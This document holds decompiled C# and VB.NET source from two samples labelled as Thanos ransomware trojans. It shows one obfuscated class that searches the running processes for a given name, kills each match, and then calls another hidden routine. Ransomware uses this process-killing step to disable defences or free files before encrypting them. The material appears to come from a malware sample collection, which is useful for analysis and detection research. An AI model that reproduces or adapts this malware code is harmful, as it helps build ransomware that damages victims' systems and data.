File: HEUR-Trojan-Ransom.MSIL.Thanos.gen-66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2/frgoWklvEOSV/xctUtgFsRkGVFBEL.cs
using System;
using System.Diagnostics;

namespace frgoWklvEOSV;

public sealed class xctUtgFsRkGVFBEL
{
	public static bool RNfapZoVNfqwThPb(Process P_0, string P_1)
	{
		try
		{
			return P_0.ProcessName.ToLower().Contains(P_1.ToLower());
		}
		catch (InvalidOperationException)
		{
			return false;
		}
		catch (NullReferenceException)
		{
			return false;
		}
		catch
		{
			return false;
		}
	}

	public static void mwRnumQnlYxOfki(string P_0, string P_1)
	{
		Process[] processes = Process.GetProcesses();
		foreach (Process process in processes)
		{
			if (RNfapZoVNfqwThPb(process, P_0.ToLower()))
			{
				try
				{
					process.Kill();
					process.WaitForExit();
					PFruJiQrcriiZ.yQfvyropwD();
				}
				catch (InvalidOperationException)
				{
				}
				catch (PlatformNotSupportedException)
				{
					break;
				}
				catch
				{
				}
			}
		}
	}
}

File: HEUR-Trojan-Ransom/MSIL/T/HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131/chaddad/frgoWklvEOSV/xctUtgFsRkGVFBEL.vb
Imports System
Imports System.Diagnostics

Namespace frgoWklvEOSV
	' Token: 0x0200001F RID: 31
	Public NotInheritable Class xctUtgFsRkGVFBEL
		' Token: 0x060000D0 RID: 208 RVA: 0x0000EC50 File Offset: 0x0000CE50
		Public Shared Function RNfapZoVNfqwThPb(process_0 As Process, string_0 As String) As Boolean
			Dim flag As Boolean
			Try
				flag = process_0.ProcessName.ToLower().Contains(string_0.ToLower())
			Catch ex As InvalidOperationException
				flag = False
			Catch ex2 As NullReferenceException
				flag = False
			Catch
				flag = False
			End Try
			Return flag
		End Function

		' Token: 0x060000D1 RID: 209 RVA: 0x0000ECB0 File Offset: 0x0000CEB0
		Public Shared Sub mwRnumQnlYxOfki(string_0 As String, string_1 As String)
			For Each process As Process In Process.GetProcesses()
				If xctUtgFsRkGVFBEL.RNfapZoVNfqwThPb(process, string_0.ToLower()) Then
					Try
						process.Kill()
						process.WaitForExit()
						PFruJiQrcriiZ.yQfvyropwD()
					Catch ex As InvalidOperationException
					Catch ex2 As PlatformNotSupportedException
						Exit Try
					Catch
					End Try
				End If
			Next
		End Sub
	End Class
End Namespace
